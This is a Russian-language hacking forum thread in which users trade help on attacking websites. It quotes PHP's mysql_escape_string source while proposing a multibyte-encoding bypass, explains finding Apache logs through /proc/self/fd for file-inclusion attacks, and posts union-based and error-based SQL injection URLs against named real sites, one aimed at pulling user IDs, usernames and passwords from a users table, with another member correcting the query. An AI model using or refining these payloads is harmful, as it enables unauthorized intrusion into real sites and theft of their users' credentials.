07.04.2010, 00:13
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от Strilo4ka
Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)
Тесть:
(эта функция уже не рекомендуется к использованию, а функция mysql_real_escape_string проверяет кодировку текущего соединения, так что у неё меньше проблем с подобным уязвимостями.)
Код:
/* {{{ proto string mysql_escape_string(string to_be_escaped)
Escape string for mysql query */
PHP_FUNCTION(mysql_escape_string)
{
char *str;
int str_len;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
return;
}
/* assume worst case situation, which is 2x of the original string.
* we don't realloc() down to the real size since it'd most probably not
* be worth it
*/
Z_STRVAL_P(return_value) = (char *) safe_emalloc(str_len, 2, 1);
Z_STRLEN_P(return_value) = mysql_escape_string(Z_STRVAL_P(return_value), str, str_len);
Z_TYPE_P(return_value) = IS_STRING;
if (MySG(trace_mode)){
php_error_docref("function.mysql-real-escape-string" TSRMLS_CC, E_DEPRECATED, "This function is deprecated; use mysql_real_escape_string() instead.");
}
}
/* }}} */
Последний раз редактировалось Root-access; 07.04.2010 в 00:17..
|
|
|
07.04.2010, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от MuTANta
Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11
мне нужно чтоб при инклуде сразу добраться до логов.
Сообщение от Root-access
Это ярлыки.
Логам апача вроде соответствуют 2 или 7.
Не всегда есть доступ к логам таким образом же.
|
|
|
|
07.04.2010, 00:22
|
|
Новичок
Регистрация: 06.04.2010
Сообщений: 4
С нами:
8473067
Репутация:
0
|
|
ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
|
|
|
|
07.04.2010, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от MuTANta
ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
последовательно, цифра за цифрой.
|
|
|
|
07.04.2010, 15:14
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 6
С нами:
8605436
Репутация:
0
|
|
Сообщение от MuTANta
ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
Вобщем так, для ясности и на глядности что и где:
Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствуе т_pid/2, а там уже
Код:
ls -la /proc/цыфра_которой_соответствует_pid/fd/
итого 0
dr-x------ 2 apache apache 0 2010-04-07 14:04 ./
dr-xr-xr-x 7 apache apache 0 2010-04-07 13:56 ../
lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log
ссылка на логи, а проинклудишь или нет, зависит от прав. 
UPD
Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.
Последний раз редактировалось гостъ; 07.04.2010 в 15:19..
|
|
|
|
07.04.2010, 15:41
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
С нами:
8990166
Репутация:
14
|
|
подобрал на сайте баблицу с логинами и пассами
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
назнаю как извлечь user_id,username,user_password
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!! |
|
|
|
07.04.2010, 16:16
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Slay90
подобрал на сайте баблицу с логинами и пассами
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
назнаю как извлечь user_id,username,user_password
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!! Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе
Последний раз редактировалось Redwood; 07.04.2010 в 16:30..
|
|
|
|
07.04.2010, 00:50
|
|
Новичок
Регистрация: 06.04.2010
Сообщений: 4
С нами:
8473067
Репутация:
0
|
|
отчего зависит цифра?
на какой лог ссылается ссыока?
|
|
|
|
07.04.2010, 01:29
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Народ.. тут Слепая MySQL injection 5'тая Версия...
_http://lubernet.su/clients/?do=cat&category=%28select+1+from+%28select+count% 280%29,concat%28%28select+table_name+from+informat ion_schema.tables+limit+0,1%29,floor%28rand%280%29 *2%29%29+from+information_schema.tables+group+by+2 +limit+0,1%29a%29--+
и не идет.. помогите плиз! |
|
|
|
07.04.2010, 01:39
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
так щас пишет что Сайт временно отключен
наверное попалили
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2050706){kind=avatar}
Похожие темы
Комбинированный вид
